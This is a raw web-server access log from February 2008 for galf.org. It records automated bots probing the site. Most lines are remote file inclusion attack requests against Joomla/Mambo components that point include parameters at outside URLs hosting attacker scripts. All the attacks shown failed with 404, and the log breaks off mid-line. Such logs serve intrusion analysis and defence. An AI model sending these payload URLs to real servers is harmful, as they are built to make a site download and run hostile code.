74.53.24.226 - - [11/Feb/2008:01:33:42 -0800] "GET /logs/access_070917.log/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.progressinternational.biz/contentimage/banners/bannerCrewConnect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.24.226 - - [11/Feb/2008:01:33:42 -0800] "GET /index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.progressinternational.biz/contentimage/banners/bannerCrewConnect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.24.226 - - [11/Feb/2008:01:33:42 -0800] "GET /logs/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.progressinternational.biz/contentimage/banners/bannerCrewConnect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.24.226 - - [11/Feb/2008:01:36:58 -0800] "GET /logs/access_070917.log/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.progressinternational.biz/contentimage/banners/bannerCrewConnect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.24.226 - - [11/Feb/2008:01:36:58 -0800] "GET /index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.progressinternational.biz/contentimage/banners/bannerCrewConnect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.24.226 - - [11/Feb/2008:01:36:59 -0800] "GET /logs/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.progressinternational.biz/contentimage/banners/bannerCrewConnect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.186.169.183 - - [11/Feb/2008:01:37:25 -0800] "GET /logs/access_070709.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.102.10.26 - - [11/Feb/2008:01:37:30 -0800] "GET /logs///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://beverlyannhope.org//images/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.102.10.26 - - [11/Feb/2008:01:37:30 -0800] "GET ///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://beverlyannhope.org//images/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.175.50 - - [11/Feb/2008:01:40:05 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.175.50 - - [11/Feb/2008:01:40:07 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.60.121.56 - - [11/Feb/2008:01:40:47 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://fantasyescorttours.com/calendar/includes/fet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.186.169.183 - - [11/Feb/2008:01:42:23 -0800] "GET /logs/access_070917.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
88.218.97.19 - - [11/Feb/2008:01:43:21 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.usw-squad.net/modules/Neos_Chronos/upload/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.74.145.108 - - [11/Feb/2008:01:44:09 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.no-such-thing.net/fandom/themes/os/os_1? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
80.74.145.108 - - [11/Feb/2008:01:44:09 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.no-such-thing.net/fandom/themes/os/os_1? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
62.2.100.138 - - [11/Feb/2008:01:45:56 -0800] "GET /logs/access_070806.log/include.php?path[docroot]=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.100.138 - - [11/Feb/2008:01:45:57 -0800] "GET /logs/include.php?path[docroot]=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.74.145.108 - - [11/Feb/2008:01:46:23 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.no-such-thing.net/fandom/themes/os/os_1? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "galf.org"
80.74.145.108 - - [11/Feb/2008:01:46:23 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.no-such-thing.net/fandom/themes/os/os_1? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "galf.org"
74.6.20.70 - - [11/Feb/2008:01:47:52 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.9.152.104 - - [11/Feb/2008:01:48:38 -0800] "GET /index.php?option=com_mambatstaff&Item